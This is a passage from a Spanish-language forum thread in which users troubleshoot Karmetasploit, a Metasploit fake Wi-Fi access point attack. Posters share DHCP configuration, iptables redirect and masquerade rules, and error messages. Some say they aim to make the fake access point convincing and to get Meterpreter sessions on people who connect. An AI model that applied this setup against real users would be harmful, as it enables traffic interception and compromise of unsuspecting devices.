en tu problema. :-* Saludos. Título: Re: [Metasploit] Karmetasploit Publicado por: Rafa2011 en 26 Marzo 2011, 21:15 pm Estimado amigo, ya vi cual es mi problema pero no se como resolverlo, me di cuenta de lo siguiente:
Cuando "estoy conectado a internet" (como ahora) hago netstat -atun y sale: udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* Pero cuando me desconecto de internet para hacer las pruebas con el access point falso Sale: udp 0 0 0.0.0.0:67 0.0.0.0:* ¿como puedo resolver este problema? Título: Re: [Metasploit] Karmetasploit Publicado por: wollvar en 4 Abril 2011, 06:55 am mira no me arranca el dhcp3-server lo hago de esta forma
/etc/init.d/dhcp3-server start me dice lo sgte root@bt:~# /etc/init.d/dhcp3-server start Starting DHCP server: dhcpd3* check syslog for diagnostics. failed! no se en que puedo estar fallando si me pudieran ayudar muchas gracias Título: Re: [Metasploit] Karmetasploit Publicado por: manmass en 17 Abril 2011, 19:43 pm Estimado amigo, ya vi cual es mi problema pero no se como resolverlo, me di cuenta de lo siguiente: Cuando "estoy conectado a internet" (como ahora) hago netstat -atun y sale: udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* Pero cuando me desconecto de internet para hacer las pruebas con el access point falso Sale: udp 0 0 0.0.0.0:67 0.0.0.0:* ¿como puedo resolver este problema? Mira, la única cosa que se me ocurre por qué te desaparece la línea del puerto 68 (parte cliente dhcp) es que al conectarte a Internet lo hagas con una ip fija de tu equipo y no obteniéndola de un dhcp real de tu adsl. Si esto es así, es normal. No hay ningún problema, o al menos yo no lo veo. Título: Re: [Metasploit] Karmetasploit Publicado por: Rafa2011 en 17 Mayo 2011, 07:02 am Hola amigos! con la novedad de que ya funciona bien mi dhcp, ya asigna ip a los clientes, el problema es que no les da internet. Aqui les pongo la info para ver si es posible que me ayuden.
La interface con internet es eth0 y tiene la ip 192.168.1.66 y netmask 255.255.255.0 que obtiene directamente del modem ADSL. La interface que corre el dhcp es at0 y tiene la ip 10.0.0.1 y el netmask 255.255.255.0 A modo informativo les pongo el contenido de mi dhcpd.conf option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; } Tambien en la terminal estoy poniendo estos comandos de iptables, pero no se, si estan bien: iptables -t nat -A PREROUTING -i at0 -j REDIRECT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE Ahora un resumen de lo que quiero: Que la maquina cliente que se conecta a mi Access Point Falso tenga internet a traves de la interface eth0. ¿Como puedo lograrlo? Título: Re: [Metasploit] Karmetasploit Publicado por: xexudj89 en 7 Septiembre 2011, 23:14 pm hola a todos me he metio en el mundo del karmetasploit xD y lo he probado en ubuntu y por ahora bien a que no he conseguido sesion de metarpreter,tambien quiero que el usuario que se conecte al ap falso pueda navegar para hacerlo mas real!y me gustaria saber si alguie lo ha conseguido hacer funcionar en backtrack 5 r1!
tambien estoy interesado en como incorporarlo a nuestro wifiway 2.0.X saludos a todos y gracias! Título: Re: [Metasploit] Karmetasploit Publicado por: dieluck en 3 Enero 2012, 14:30 pm holax buen dia a todos lo que pasa que al arrankar el karma.rc me sale esto en las primeraslineas
Código: [-] Failed to load plugin from /opt/framework/msf3/plugins/db_sqlite3: no such file to load -- /opt/framework/msf3/plugins/db_sqlite3 utilizo bt5 r1 a 64 |